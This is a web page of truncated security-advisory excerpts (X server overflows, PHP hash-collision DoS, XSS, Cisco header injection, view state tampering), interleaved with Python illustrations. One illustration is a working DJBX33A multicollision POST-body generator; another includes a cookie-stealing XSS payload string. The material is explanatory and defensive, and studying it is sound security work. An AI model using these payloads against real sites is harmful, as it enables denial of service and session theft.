
LayerOne 2008 - CFP Released

[at] layerone [dot] info no later than March 15, 2008. You will
receive notice no later than April 1, 2008 to let you know if your
talk has been accepted.

As we have a single presentation track, please bear in mind that
speaking slots are limited to one hour. While presenters typically
divide the hour into separate presentation and Q&A sessions, you may
structure your time however you see fit. If you think your
presentation will run longer, or have any special requirements, please
include this information in your submission and we will do our best to
accommodate you.

CVE-2009-3583, confirming problem and adding info

by another author.

I have not checked other offshoots.

I am writing because I don't think the original full disclosure email
provided sufficient information as to how this could be typically
exploited in a system with typical installations of SQL-Ledger or
offshoots.  Indeed, when combined with standard functionality of the
software in typical configurations, the vulnerability is relatively
easy to exploit and does not require external upload access.


n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table

PHP 5 uses the DJBX33A (Dan Bernstein's times 33, addition) hash
function and parses POST form data into the $_POST hash table. Because
of the structure of the hash function, it is vulnerable to an equivalent
substring attack.

The maximal POST request size is typically limited to 8 MB, which, when
filled with a set of multi-collisions, would consume about four hours of
CPU time on an i7 core. Luckily, this time cannot be exhausted, because
it is limited by the max_input_time configuration parameter (default
configuration: -1, i.e. unlimited; Ubuntu and several BSDs: 60 seconds).
If the max_input_time parameter is set to -1 (theoretically:
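As an added example, not code from the n.runs advisory excerpted above: DJBX33A as PHP 5 computes it, and the "equivalent substring" trick that turns one colliding pair of two-byte strings into 2**n colliding POST parameter names. The initial value 5381 and the times-33-plus-byte step are PHP 5's; the 32-bit truncation assumes a 32-bit build (a 64-bit build truncates later, but the pairs found below collide before any truncation, so they work there as well). The POST body built at the end is constructed for the demonstration.

```python
"""
DJBX33A multi-collision generator (added illustration, not the advisory's code).
"""
from __future__ import annotations

from itertools import product

MASK32 = 0xFFFFFFFF
# Keys restricted to [0-9A-Za-z] so they survive URL-encoding in a POST body unchanged.
PRINTABLE = bytes(range(0x30, 0x3A)) + bytes(range(0x41, 0x5B)) + bytes(range(0x61, 0x7B))


def djbx33a(s: bytes, mask: int = MASK32) -> int:
    """PHP 5's hash: h = 5381; for each byte c: h = h*33 + c, truncated to the word size."""
    h = 5381
    for c in s:
        h = (h * 33 + c) & mask
    return h


def equivalent_pairs(alphabet: bytes = PRINTABLE) -> list[tuple[bytes, bytes]]:
    """Two-byte strings a1a2 and b1b2 with 33*a1 + a2 == 33*b1 + b2.

    Two rounds of the hash compute h*33*33 + a1*33 + a2, so such pairs hash identically
    from ANY starting state; they can therefore be swapped at any position of a longer key.
    """
    by_value: dict[int, list[bytes]] = {}
    for a, b in product(alphabet, repeat=2):
        by_value.setdefault(33 * a + b, []).append(bytes([a, b]))
    return [(v[0], v[1]) for v in by_value.values() if len(v) >= 2]


def multicollisions(n_positions: int, pair: tuple[bytes, bytes]) -> list[bytes]:
    """Every way of filling n two-byte slots from the pair: 2**n distinct keys, one bucket."""
    return [b"".join(choice) for choice in product(pair, repeat=n_positions)]


def all_collide(keys: list[bytes]) -> bool:
    """True when every key maps to the same DJBX33A value."""
    return len({djbx33a(k) for k in keys}) == 1


def post_body(keys: list[bytes]) -> bytes:
    """Constructed POST body: every key lands in the same $_POST bucket, so inserting
    key number k costs k string comparisons, i.e. quadratic work in the number of keys."""
    return b"&".join(k + b"=x" for k in keys)


if __name__ == "__main__":
    pair = equivalent_pairs()[0]
    keys = multicollisions(10, pair)          # 1024 keys, one hash value
    print(pair, hex(djbx33a(keys[0])), all_collide(keys), len(post_body(keys)), "bytes")
```

"Ez" and "FY" are one such pair (69*33 + 122 == 70*33 + 89 == 2399), and "G8" is a third member of the same class; an 8 MB body holds on the order of 2**19 such keys, which is where the advisory's CPU-time figure comes from.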

CanSecWest 2008 PWN2OWN - Mar 26-28

Announcing CanSecWest PWN2OWN 2008.
===================================

Three targets, all patched.  All in typical client configurations with
typical user configurations.  You hack it, you get to keep it.

Each has a file on it containing the instructions on how to claim the
prize.


iDefense Security Advisory 06.11.08: Multiple Vendor X Server Render Extension AllocateGlyph() Integer Overflow Vulnerability

II. DESCRIPTION

Local exploitation of an integer overflow vulnerability in the X.Org X
server, as included in various vendors' operating system distributions,
could allow an attacker to execute arbitrary code with the privileges of
the X server, typically root.

The vulnerability exists within the AllocateGlyph() function, which is
called from several request handlers in the render extension. This
function takes several values from the request, and multiplies them
together to calculate how much memory to allocate for a heap buffer.
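As an added example, not the X.Org code: how a request-controlled product silently wraps when computed in C's 32-bit unsigned arithmetic, and the pre-multiplication check that prevents it. The dimension names (width, height, bytes per pixel) and the sample request values are assumed for the illustration; the advisory only says that several request values are multiplied together.

```python
"""
Allocation-size overflow: wrapped vs. checked multiply (added illustration).
"""
from typing import Optional

UINT32_MAX = 0xFFFFFFFF


def wrapped_alloc_size(*dims: int) -> int:
    """Size as an unsigned 32-bit C multiply produces it: the product wraps modulo 2**32."""
    size = 1
    for d in dims:
        size = (size * d) & UINT32_MAX
    return size


def checked_alloc_size(*dims: int) -> Optional[int]:
    """Return the product only if every intermediate fits in 32 bits, else None.

    Testing 'd > UINT32_MAX // size' BEFORE multiplying is the standard idiom: a check after
    the fact cannot tell a wrapped result from an honest small one.  Zero and negative
    dimensions are rejected too, since a zero-byte buffer is just as easy to overrun.
    """
    size = 1
    for d in dims:
        if d <= 0 or d > UINT32_MAX // size:
            return None
        size *= d
    return size


def overflow_gap(*dims: int) -> int:
    """Bytes a copy loop that iterates over the true width*height*bpp would write past a
    buffer that was sized with the wrapped product (0 when nothing wraps)."""
    true_size = 1
    for d in dims:
        true_size *= d
    return true_size - wrapped_alloc_size(*dims)


if __name__ == "__main__":
    # Constructed request values: 0x10000 * 0x10001 = 0x1_0001_0000, which wraps to 0x10000.
    for dims in [(16, 16, 4), (0x10000, 0x10001, 1)]:
        print(dims, "wrapped:", hex(wrapped_alloc_size(*dims)),
              "checked:", checked_alloc_size(*dims), "gap:", hex(overflow_gap(*dims)))
```

The second set of values is the shape of input the advisory describes: the server allocates a 64 KiB heap buffer and then processes a glyph of about 4 GiB, so everything after the first 64 KiB is written over whatever follows the buffer.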

iDefense Security Advisory 06.11.08: Multiple Vendor X Server Render Extension Gradient Creation Integer Overflow Vulnerability

II. DESCRIPTION

Local exploitation of an integer overflow vulnerability in the X.Org X
server, as included in various vendors' operating system distributions,
could allow an attacker to execute arbitrary code with the privileges of
the X server, typically root.

The vulnerability occurs when parsing a client request for one of the
following functions:

  SProcRenderCreateLinearGradient

Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

----------------------------------------------------------------------------

Help and Support Centre is the default application provided to access online
documentation for Microsoft Windows. Microsoft supports accessing help documents
directly via URLs by installing a protocol handler for the scheme "hcp", 
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.

Using hcp:// URLs is intended to be safe, as when invoked via the registered
protocol handler the command line parameter /fromhcp is passed to the help
centre application. This flag switches the help centre into a restricted mode,

iDefense Security Advisory 10.12.11: Apple MobileSafari Attachment Viewing Cross Site Scripting Vulnerability

Remote exploitation of a cross site scripting vulnerability in Apple
Inc.'s MobileSafari could allow an attacker to view sensitive
information in the context of the targeted domain.

This vulnerability occurs in MobileSafari's handling of the
Content-Disposition header, which is typically used to inform the
browser that an attachment is contained in the current response. Typical
browser behavior is to prompt the user with an Open dialog, asking them
how they would like to handle the attachment content (such as opening an
external program). However, MobileSafari does not prompt the user, and
instead opens the attached content in the browser. If an attacker can

iDefense Security Advisory 06.11.08: Multiple Vendor X Server Record and Security Extensions Multiple Memory Corruption Vulnerabilities

II. DESCRIPTION

Local exploitation of multiple memory corruption vulnerabilities in the
X.Org X server, as included in various vendors' operating system
distributions, could allow an attacker to execute arbitrary code with
the privileges of the X server, typically root.

Multiple vulnerabilities are present in the Record and Security
extensions. In both cases, untrusted values are taken from a client
request, and used to swap the byte order of heap memory that follows
the client request. Since the number of bytes to swap is not properly

VMware Emulation Flaw x64 Guest Privilege Escalation (2/2)

preclusive safety checks.  (For more information on SWAPGS and the GS:
segment override in the x64 architecture, see "AMD64 Architecture
Programmer's Manual" Volumes 2 and 3, "24593.pdf" and "24594.pdf".)

The following pseudo-assembly snippet provides a brief illustration of
a typical x64-specific interrupt handler that permits exploitation of
the VMware emulation flaws:

  ISR_Entry_Point:

    ; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:

VMware Emulation Flaw x64 Guest Privilege Escalation (1/2)

preclusive safety checks.  (For more information on SWAPGS and the GS:
segment override in the x64 architecture, see "AMD64 Architecture
Programmer's Manual" Volumes 2 and 3, "24593.pdf" and "24594.pdf".)

The following pseudo-assembly snippet provides a brief illustration of
a typical x64-specific interrupt handler that permits exploitation of
the VMware emulation flaw:

  ISR_Entry_Point:

    ; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:

PMCMA: Post Memory Corruption Memory Analysis

  Pmcma aims at automating exploitation of invalid memory writes (whether
  they are the consequence of an overflow in a writable section, of a
  missing format string, of an integer overflow, of variable misuse, or of
  any other type of memory corruption).

  This is typically useful in determining whether a given bug is a security
  vulnerability (if it is exploitable at all, and with what
  reliability).


--[ What is it ?

SECURITY ADVISORY - Level Platforms, Inc. Service Center Install Data HTTP Vulnerability

Overview: 
=========

Level Platforms, Inc.'s (LPI) flagship product, Managed Workplace Service
Center, provides remote monitoring, reporting and alerting of
device and network status. The software is typically used by Managed
Service Providers and large IT departments. There is also a hosted
version offered through Ingram Micro.

LPI's software has two components, a Service Center (server) component
and an Onsite Manager (client) component. The Service Center is typically

iDefense Security Advisory 01.17.08: Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability

II. DESCRIPTION

Local exploitation of an invalid array index vulnerability in the X.Org
X server, as included in various vendors' operating system
distributions, could allow an attacker to execute arbitrary code with
the privileges of the X server, typically root.

The vulnerability exists within the XFree86-Misc extension. When
processing a request, a 32-bit value from the client's request is used
as an index into an array of structures. This structure contains an
array of function pointers, one of which is used later in the request

mvnForum 1.1 Cross Site Scripting

 that is executed when other users use the quick reply button shown
 for every post.

 This point of injection is possible because the topic text is part
 of an "onclick" event used for the quick reply function and the 
 software only escapes characters that are typical for HTML cross
 site script attacks. In this case, the single quote character is not
 escaped.
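As an added example, not mvnForum's code: topic text dropped into the quick-reply onclick handler, built three ways, plus a checker that does what the browser does (entity-decode the attribute, then parse it as JavaScript). The markup shape and the quickReply() function name are assumed; the post only says the topic text sits inside an "onclick" string and that the single quote is not escaped.

```python
"""
Escaping for a JavaScript string inside an HTML attribute (added illustration).
"""
import html
import json
import re
from typing import Optional


def _html_only(text: str) -> str:
    """The escaping the post describes: HTML metacharacters, but not the single quote."""
    return (text.replace("&", "&amp;").replace("<", "&lt;")
                .replace(">", "&gt;").replace('"', "&quot;"))


def quick_reply_vulnerable(topic: str) -> str:
    return f"<a href=\"#\" onclick=\"quickReply('{_html_only(topic)}')\">reply</a>"


def quick_reply_entity_only(topic: str) -> str:
    """Tempting but wrong fix: entity-encode the single quote as well.  The browser decodes
    &#x27; back to ' before the handler is parsed, so the string literal still ends early."""
    escaped = _html_only(topic).replace("'", "&#x27;")
    return f"<a href=\"#\" onclick=\"quickReply('{escaped}')\">reply</a>"


def quick_reply_safe(topic: str) -> str:
    """Right order: JS-string-encode first (json.dumps backslash-escapes quotes, backslashes
    and control characters; '/' is escaped so '</' cannot appear), then HTML-attribute-encode
    the resulting literal.  Decoding happens in the reverse order, so both layers hold."""
    js_literal = json.dumps(topic).replace("/", "\\/")
    return f"<a href=\"#\" onclick=\"quickReply({html.escape(js_literal, quote=True)})\">reply</a>"


def _js_string_literal_end(src: str) -> Optional[int]:
    """Index of the closing quote of the literal starting at src[0], honouring backslashes."""
    q = src[0] if src else ""
    if q not in ("'", '"'):
        return None
    i = 1
    while i < len(src):
        if src[i] == "\\":
            i += 2
        elif src[i] == q:
            return i
        else:
            i += 1
    return None


def is_single_literal(markup: str) -> bool:
    """True when the decoded handler is exactly quickReply(<one string literal>), i.e. the
    topic could not escape the literal and run as code."""
    m = re.search(r'onclick="([^"]*)"', markup)
    if not m:
        return False
    js = html.unescape(m.group(1))            # what the HTML parser hands to the JS engine
    call = re.fullmatch(r"quickReply\((.*)\)", js, re.S)
    if not call:
        return False
    arg = call.group(1)
    end = _js_string_literal_end(arg)
    return end is not None and end == len(arg) - 1


if __name__ == "__main__":
    payload = "x');alert(document.cookie);//"   # constructed topic text
    for build in (quick_reply_vulnerable, quick_reply_entity_only, quick_reply_safe):
        print(f"{build.__name__:26s} safe={is_single_literal(build(payload))}")
```

The middle variant is the common mistake: escaping the quote at the HTML layer looks right in the page source but is undone before the script runs; only a backslash escape survives into the JavaScript string.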

I. Description


Re: [Full-disclosure] what is this?

>   FTP  and remove additional text (usually at the end of the file, after
>   </html>) from all HTML/PHP pages.

Ummmm -- the only part of that likely to be relevant here is the last.

These kinds of web page "compromises" are typically achieved through 
bad/ill-configured/non-updated server-side web applications (or their 
underlying script engines) and are typically achieved without requiring 
any more special or privileged access to the victim sites than the 
ability to run a clever Google search or your own brute-force spidering 
via a bot-net, etc.

MITKRB5-SA-2009-002: ASN.1 decoder frees uninitialized pointer [CVE-2009-0846]

Kerberos application, including the Kerberos administration daemon
(kadmind) or the KDC to crash, and possibly to execute arbitrary code.

Compromise of the KDC or kadmind can compromise the Kerberos key
database and host security on the KDC host.  (The KDC and kadmind
typically run as root.)  We believe this scenario is highly unlikely,
given the details of the vulnerability.

Third-party applications using MIT krb5 may also be vulnerable.

MITIGATING FACTORS

iDefense Security Advisory 08.03.10: Citrix ICA Client ActiveX Memory Corruption Vulnerability

implement the client's functionality.

The vulnerability occurs in a certain function, which is accessible
through JavaScript. This function is responsible for reading a remote
ICA (Independent Computing Architecture) file from the server.
Typically, the contents of this file are used to provide options
controlling the connection to the application gateway.

During the reading of this file, the vulnerable function fails to check
the return value of the realloc() function. It then adds the number of
bytes read from the file so far to the value returned, and appends file

COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

your vendor.


===[ DESCRIPTION ]======================================================

Typically, an unprivileged user cannot send a signal to processes running
with a different UID. Due to a vulnerability found in the Linux kernel, any
local user may bypass this security restriction and send an arbitrary signal
to any child process executed by the user.

When a parent process dies or exits, its child processes may receive a

iDefense Security Advisory 06.21.10: Multiple Vendor LibTIFF 3.9.2 Stack Buffer Overflow Vulnerability

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the current user. In order to exploit this
vulnerability, a user must load a web page containing a specially
crafted TIFF image. An attacker typically accomplishes this via social
engineering or injecting content into compromised, trusted sites.
Typical social engineering attacks will pass URLs as part of instant
messages or electronic mail.

IV. DETECTION

Re: Firewire Attack on Windows Vista

Steve Shockley wrote:

> Stefan Kanthak wrote:
>> 2. The typical user authentication won't help, we're at hardware
>> level here, and no OS needs to be involved.
> 
> So, if I understand you correctly, if I boot my machine into DOS the 
> memory can be read over Firewire?

If DMA is enabled on the Firewire interface, it's possible!

VSR Advisory: Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities

Issue 1: Weak Enforcement of Authority in HTTP Certificate Headers
------------------------------------------------------------------
Cisco Bug Id - CSCSZ04690
Affects      - Cisco CSS

The first weakness affecting the Cisco CSS is that, in a typical client
certificate configuration, HTTP clients may confuse web applications by
injecting their own certificate headers.  When utilizing the CSS to
terminate SSL communications, SSL client certificates are first
authenticated by the CSS.  From there, the CSS will normally pass the
client's identity to the back-end web server in the form of several HTTP
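As an added example, not Cisco's code: the trust-boundary rule an SSL-terminating proxy has to apply to identity headers, shown as the weak behaviour the advisory describes beside the hardened one, with a naive back-end that trusts whatever header arrives. The header names (X-SSL-Client-CN, X-SSL-Client-Verified) and the sample request are assumed for the illustration; the CSS's actual header names are not given in this excerpt.

```python
"""
Client-certificate identity headers: strip inbound copies before asserting your own
(added illustration).
"""
from typing import List, Optional, Tuple

Header = Tuple[str, str]
IDENTITY_PREFIX = "x-ssl-client-"   # namespace only the proxy is allowed to populate


def _proxy_headers(verified_cn: Optional[str]) -> List[Header]:
    """Headers the proxy adds after it has authenticated the client certificate."""
    if verified_cn is None:
        return []
    return [("X-SSL-Client-Verified", "SUCCESS"), ("X-SSL-Client-CN", verified_cn)]


def forward_trusting_client(client_headers: List[Header],
                            verified_cn: Optional[str]) -> List[Header]:
    """Weak behaviour: the proxy appends its own headers but leaves the client's copy in
    place, so the back-end sees two candidates (and the attacker's comes first)."""
    return list(client_headers) + _proxy_headers(verified_cn)


def forward_stripping_client(client_headers: List[Header],
                             verified_cn: Optional[str]) -> List[Header]:
    """Hardened: drop every inbound header in the proxy's own namespace, then add the real
    result.  With no certificate presented, the back-end sees no identity header at all."""
    kept = [(k, v) for k, v in client_headers
            if not k.lower().startswith(IDENTITY_PREFIX)]
    return kept + _proxy_headers(verified_cn)


def backend_identity(headers: List[Header]) -> Optional[str]:
    """A typical back-end: trusts the first X-SSL-Client-CN it finds, assuming the proxy set it."""
    for k, v in headers:
        if k.lower() == "x-ssl-client-cn":
            return v
    return None


if __name__ == "__main__":
    # Constructed request from an attacker with no client certificate at all.
    injected = [("Host", "app.example"),
                ("X-SSL-Client-Verified", "SUCCESS"),
                ("X-SSL-Client-CN", "CN=admin")]
    print("weak   :", backend_identity(forward_trusting_client(injected, None)))
    print("hardened:", backend_identity(forward_stripping_client(injected, None)))
```

The same rule applies to every identity-bearing header a proxy adds (X-Forwarded-For and friends included): anything in that namespace arriving from the client side is hostile input, not a value to be passed along.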

Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php

 
Introduction:
 
Remote PHP file inclusion is possible when RG_EMULATION is not defined in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP, register_globals
must be 'off' for this exploit to work.
 
In Joomla >=1.0.13, configuration.php-dist disables register_globals

FW: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server

About:
Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
It is a fast, easy to use commercial, standalone "all-in-one" file-sharing web server.

Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories).  Files can be shared anonymously, or via EFSWS's built-in user management.   EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access).    Users log in, and are presented with a menu of files that have been published and that are made available for download.

EFSWS uses the MGH Software "myDB" database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc.   A free db parser is available at:
http://www.mghsoft.com/

Please see vendor site and db engine site for more details.

Symlink attack with Solaris Update manager and Sun Patch Cluster

1/24/2010

With the GUI Sun Update Manager being used to install patches on a system,
local users can easily run scripts and create symlinks in an attempt to
clobber files and potentially escalate privileges, as this application is
typically run in multi-user mode.
Many patches use insecure file creation in /tmp to store data during
installation. The easiest one to exploit is /tmp/CLEANUP, which is used in a
handful of package installation scripts:

script code is typically:

RE: [WEB SECURITY] Trustwave's SpiderLabs Security Advisory TWSL2010-001

SpiderLabs has documented view state tampering
vulnerabilities in three products from separate vendors.
View states are used by some web application frameworks to
store the state of HTML GUI controls. View states are
typically stored in hidden client-side input fields,
although server-side storage is widely supported.

The affected vendors generally recommend that client-side
view states are cryptographically signed and/or encrypted,
but specific exploits have not been previously documented.
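As an added example, not Trustwave's or any affected vendor's code: an unsigned client-side view state beside an HMAC-signed one, with the edit an attacker makes in the browser applied to both. The serialization, the field names, the key handling and the sample state are all assumed for the illustration.

```python
"""
View state tampering: unsigned vs. HMAC-signed hidden field (added illustration).
"""
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

TAG_LEN = hashlib.sha256().digest_size
SERVER_KEY = secrets.token_bytes(32)   # per-application secret; never sent to the client


def _serialize(state: dict) -> bytes:
    return json.dumps(state, sort_keys=True, separators=(",", ":")).encode()


def encode_unsigned(state: dict) -> str:
    """Body only, base64 so it fits in a hidden input.  Anyone can rewrite it."""
    return base64.urlsafe_b64encode(_serialize(state)).decode()


def decode_unsigned(token: str) -> Optional[dict]:
    try:
        return json.loads(base64.urlsafe_b64decode(token.encode()))
    except (ValueError, UnicodeDecodeError):
        return None


def encode_signed(state: dict, key: bytes = SERVER_KEY) -> str:
    """body || HMAC-SHA256(key, body); the tag binds the whole serialized state."""
    body = _serialize(state)
    return base64.urlsafe_b64encode(body + hmac.new(key, body, hashlib.sha256).digest()).decode()


def decode_signed(token: str, key: bytes = SERVER_KEY) -> Optional[dict]:
    """Verify the tag (constant-time compare) before trusting a single byte of the body."""
    try:
        raw = base64.urlsafe_b64decode(token.encode())
    except ValueError:
        return None
    if len(raw) <= TAG_LEN:
        return None
    body, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        return None
    try:
        return json.loads(body)
    except ValueError:
        return None


def tamper(token: str, field: str, value, signed: bool) -> str:
    """What the attacker does in the browser: edit one field of the hidden input, keeping
    whatever tag was there (it cannot be recomputed without the server key)."""
    raw = base64.urlsafe_b64decode(token.encode())
    body, tag = (raw[:-TAG_LEN], raw[-TAG_LEN:]) if signed else (raw, b"")
    state = json.loads(body)
    state[field] = value
    return base64.urlsafe_b64encode(_serialize(state) + tag).decode()


if __name__ == "__main__":
    state = {"user_id": 42, "is_admin": False, "page": 3}   # constructed control state
    print("unsigned:", decode_unsigned(tamper(encode_unsigned(state), "is_admin", True, False)))
    print("signed  :", decode_signed(tamper(encode_signed(state), "is_admin", True, True)))
```

Signing alone stops modification; it does not hide the contents, so a state that carries secrets additionally needs encryption, and a signed state can still be replayed unless it is bound to the session (for instance by mixing the session identifier into the HMAC input).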

CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software

  vulnerabilities in the ActiveX objects themselves or use their
  functionality to, for example, read arbitrary files from the victim's
  file system or even execute arbitrary shell commands in the victim's
  workstation.
- Directly attack vulnerable versions of Internet Explorer in user
  workstations. This is a typical client-side attack scenario and could
  lead to the remote execution of arbitrary code in the victim's
  workstation. In this scenario "one-click" IE bugs (exploitation requires
  user assistance) become "zero-click" bugs (exploitation does not require
  user interaction).



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
